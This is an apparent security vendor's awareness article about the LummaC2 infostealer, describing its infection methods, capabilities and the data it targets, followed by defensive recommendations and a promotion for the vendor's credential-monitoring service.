LummaC2 Stealer, also known as Lumma Stealer, has emerged as one of 2025’s most dangerous infostealer malware threats. Active since 2022, LummaC2 stealer can exfiltrate data from browsers such as Chrome, Edge, and Firefox. It can also rob cryptocurrency wallets and install other types of malware.
It’s available on underground forums as a malware-as-a-service (MaaS) platform, making sophisticated cybercrime accessible to threat actors with minimal technical skills.
In May 2025, Microsoft and the US Department of Justice shut down more than 2,300 malicious domains operating the LummaC2 stealer infrastructure. Despite this, the threat never went away. The number of accounts targeted by LummaC2 is now reported to be returning to pre-takedown levels.
How does LummaC2 infect your devices? Common traps to watch out for
LummaC2 uses multiple infection vectors, including:
-
Phishing emails: LummaC2 is distributed via phishing emails impersonating well-known brands. The emails contain malicious attachments or links to cloned websites that install LummaC2 on the victim’s device.
-
Malvertising: Cybercriminals insert fake adverts into search engine results for queries about software and apps. Again, the ads are linked to malicious sites that install LummaC2.
-
Drive-by downloads: Cybercriminals modify legitimate websites, exploiting vulnerabilities or misconfigurations to inject malicious JavaScript. The modified sites install LummaC2 on visitors’ devices, or display malicious content that tricks them into installing it.
-
Cracked or pirated software: Cybercriminals hack legitimate apps so that they install LummaC2, and distribute the hacked versions on file-sharing platforms. Often, LummaC2 isn’t bundled with the hacked app, but is installed silently later.
-
ClickFix techniques: On Windows devices, ClickFix scams trick the victim into installing malicious software by manually running a script. For example, to fix a phony technical issue, or verify that they’re not a robot by clicking a fake CAPTCHA image.
-
Other malware: LummaC2 can be installed by some other types of malware, such as DanaBot.
What makes LummaC2 so dangerous?
LummaC2 has some key features that make it particularly threatening:
-
Ready availability with MaaS: On underground forums, LummaC2 is available as an out-of-the-box cybercrime solution, complete with customer support and regular updates.
-
Advanced evasion techniques: LummaC2 uses code obfuscation and anti-analysis features to sidestep conventional antivirus software.
-
Real-time data exfiltration: After installation, LummaC2 starts working immediately, stealing data and transmitting it to criminal servers using encrypted channels.
-
Ease of use: The user-friendly interface allows cybercriminals to launch sophisticated attacks without the need for advanced technical know-how.
What information does LummaC2 steal?
LummaC2 targets a wide range of sensitive data, including:
-
Login credentials for banking, email, and business accounts.
-
Autofill data including addresses, phone numbers, and payment details.
-
Browser cookies and saved sessions, allowing criminals to bypass multi-factor authentication.
-
Cryptocurrency wallet information.
-
Documents, including PDF, .docx., and .rtf files.
This stolen information can be used to commit further cybercrime. For example, digital fraud, account takeover attacks, and social engineering attacks such as spear phishing or whaling.
Mitigation and defence: How to protect against LummaC2
To protect your organisation against the threat from LummaC2:
-
Provide security awareness training so that everyone is on the alert for suspicious emails, attachments, and links, and knows how to spot and report potential phishing attempts.
-
Implement multi-factor authentication (MFA) on all your systems and accounts.
-
Keep all your software and systems updated and patched to fix vulnerabilities.
-
Enforce strict application controls so that users can only install verified software from safe sources.
-
Perform regular security backups and store them offline to help defend against ransomware attacks.
-
Define your password policy to ensure that everyone uses strong, unique passwords that they never reuse or share, and stores them in a password manager tool.
-
Use a cyber threat intelligence (CTI) and credential monitoring solution. CTI solutions such as Cybercheck continuously monitor for exposed credentials and personal data, providing early warning to stop attacks before they breach your defences. If cybercriminals are trading information about you or your organisation, we alert you immediately. That means you can stay extra vigilant, take proactive steps like changing passwords or blocking cards, and shut out the attackers before they make you their next victim.
